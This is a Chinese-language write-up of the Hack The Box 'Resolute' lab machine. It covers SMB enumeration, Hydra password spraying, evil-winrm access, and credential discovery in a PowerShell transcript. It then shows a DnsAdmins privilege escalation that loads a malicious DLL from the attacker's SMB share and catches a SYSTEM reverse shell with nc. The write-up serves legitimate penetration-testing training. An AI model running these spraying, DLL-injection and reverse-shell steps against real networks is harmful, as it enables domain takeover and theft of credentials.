HTB-Windows-Resolute

infocard

知识点：
信息收集和dnsadmins用户组提权

信息收集

端口扫描

# Nmap 7.70 scan initiated Sat Jun  6 11:11:59 2020 as: nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,5985,9389,49665,49666,49667,49671,49677,49688 -oA scan/Resolute 10.10.10.169
Nmap scan report for localhost (10.10.10.169)
Host is up (0.26s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-06 03:23:16Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  unknown
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49677/tcp open  unknown
49688/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=6/6%Time=5EDB098C%P=x86_64-apple-darwin17.3.0%r
SF:(DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07ver
SF:sion\x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h31m09s, deviation: 4h02m31s, median: 11m08s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-06-05T20:24:10-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-06-06 11:24:11
|_  start_date: 2020-06-06 00:29:52

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun  6 11:13:15 2020 -- 1 IP address (1 host up) scanned in 75.81 seconds

135、139、445端口开放，存在SMB服务，使用enum4linux进行信息收集，

1	$ enum4linux 10.10.10.169

发现的有意思的事情：

域主机，域名：MEGABANK
发现账号密码：marko Welcome123!

用户列表：

Administrator
Guest
krbtgt
DefaultAccount
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki

获取melanie用户

使用enum4linux、smbclient登录，失败，于是使用发现的所有用户名和密码爆破SMB服务，寻找可用账号；

$ hydra -L users.txt -P passwd.txt 10.10.10.169 smb
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-02 22:32:33
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 27 login tries (l:27/p:1), ~27 tries per task
[DATA] attacking smb://10.10.10.169:445/
[445][smb] host: 10.10.10.169   login: melanie   password: Welcome123!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-02 22:33:24

我是用mac爆破时，如果使用smb://10.10.10.169则无法爆破出账号密码，如果使用10.10.10.169 smb则可以爆破出来。

最后爆破出melanie Welcome123!

由于开放5985端口wsman服务，于是直接使用evil-winrm获取终端：

$ evil-winrm -i 10.10.10.169 -u melanie -p 'Welcome123!'

Info: Starting Evil-WinRM shell v1.7

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> ls


    Directory: C:\Users\melanie\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         6/5/2020  10:34 AM         241664 winpeas.exe


*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\melanie\desktop> ls


    Directory: C:\Users\melanie\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        12/3/2019   7:33 AM             32 user.txt


*Evil-WinRM* PS C:\Users\melanie\desktop> type user.txt
0c3be45fcfe249796ccbee8d3a978540

melanie to ryan

上传内网信息收集工具，进行信息收集，查看文件系统，在PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt文件中找到域用户megabank\ryan及账号密码

1	cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

ryan to system

查看用户所在的用户组

net user ryan /domain
whoami /groups

*Evil-WinRM* PS C:\Users\ryan> net user ryan /domain
User name                    ryan
Full Name                    Ryan Bertrand
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/5/2020 8:43:02 PM
Password expires             Never
Password changeable          6/6/2020 8:43:02 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   6/5/2020 10:16:17 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Contractors
The command completed successfully.

*Evil-WinRM* PS C:\Users\ryan> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
*Evil-WinRM* PS C:\Users\ryan> whoami
megabank\ryan

用户组dnsadmins提权

写入恶意dll到dns配置

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd \\Resolute /config /serverlevelplugindll \\10.10.14.13\share\privesc.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

重启dns服务

1 2	$ sc.exe \\Resolute stop dns $ sc.exe \\Resolute start dns

SmbServer获得NTLM Hash

python smbserver.py share workspace/htb/Resolute
Impacket v0.9.22.dev1+20200605.133909.874d7ae4 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,50563)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:4141414141414141:cfe1616a120b772f65297bac6c19bc98:0101000000000000002d7c75543cd6013d464c2b327c44f200000000010010004600690056004400420078006800670003001000460069005600440042007800680067000200100062004300660067004f0044005a0059000400100062004300660067004f0044005a00590007000800002d7c75543cd601060004000200000008003000300000000000000000000000004000008c635b5e900e78ca8c7a8f352b339a178f5404a45222a9104bbfde364acca55b0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310033000000000000000000
[*] Disconnecting Share(1:IPC$)

nc收到system权限的shell

$ nc -lv 4444
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

拿到root权限

C:\Windows\system32>cd c:\Users
cd c:\Users

c:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 923F-3611

 Directory of c:\Users

12/04/2019  03:46 AM    <DIR>          .
12/04/2019  03:46 AM    <DIR>          ..
09/25/2019  10:43 AM    <DIR>          Administrator
12/04/2019  03:46 AM    <DIR>          melanie
11/20/2016  07:39 PM    <DIR>          Public
09/27/2019  07:05 AM    <DIR>          ryan
               0 File(s)              0 bytes
               6 Dir(s)  30,129,467,392 bytes free

c:\Users>cd Administrator\Desktop
cd Administrator\Desktop

c:\Users\Administrator\Desktop>type root.txt
type root.txt
e1d94876a506850d0c20edb5405e619c

参考文章

DnsAdmins提升至System

DnsAdmins提升至System - RedTeam

从linux转发文件到windows